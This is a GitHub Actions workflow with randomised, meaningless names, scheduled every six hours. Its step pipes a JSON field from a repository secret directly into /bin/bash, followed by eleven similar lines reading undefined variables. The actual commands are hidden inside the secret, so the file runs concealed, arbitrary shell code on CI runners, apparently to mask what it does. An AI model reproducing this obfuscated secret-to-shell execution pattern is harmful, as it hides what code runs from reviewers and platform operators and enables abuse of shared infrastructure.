name: chenqiushen9183

on:
  workflow_dispatch:
  schedule:
    - cron: '21 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: chenqiushen9183
        env:
          hx589: ${{ secrets.hx589 }}
        run: |
          echo $hx589 | jq -r .jf532 | /bin/bash
          echo $icv70382 | jq -r .t159 | /bin/bash
          echo $v507 | jq -r .c519 | /bin/bash
          echo $yvks604 | jq -r .ag17 | /bin/bash
          echo $frr5714 | jq -r .zflph73824 | /bin/bash
          echo $c9 | jq -r .vudch377 | /bin/bash
          echo $px056 | jq -r .vmz8 | /bin/bash
          echo $cakoq92 | jq -r .cgupl7962 | /bin/bash
          echo $a639 | jq -r .n523 | /bin/bash
          echo $dl59 | jq -r .wtb3 | /bin/bash
          echo $yog4 | jq -r .rctu80618 | /bin/bash
          echo $t407 | jq -r .fscff67 | /bin/bash

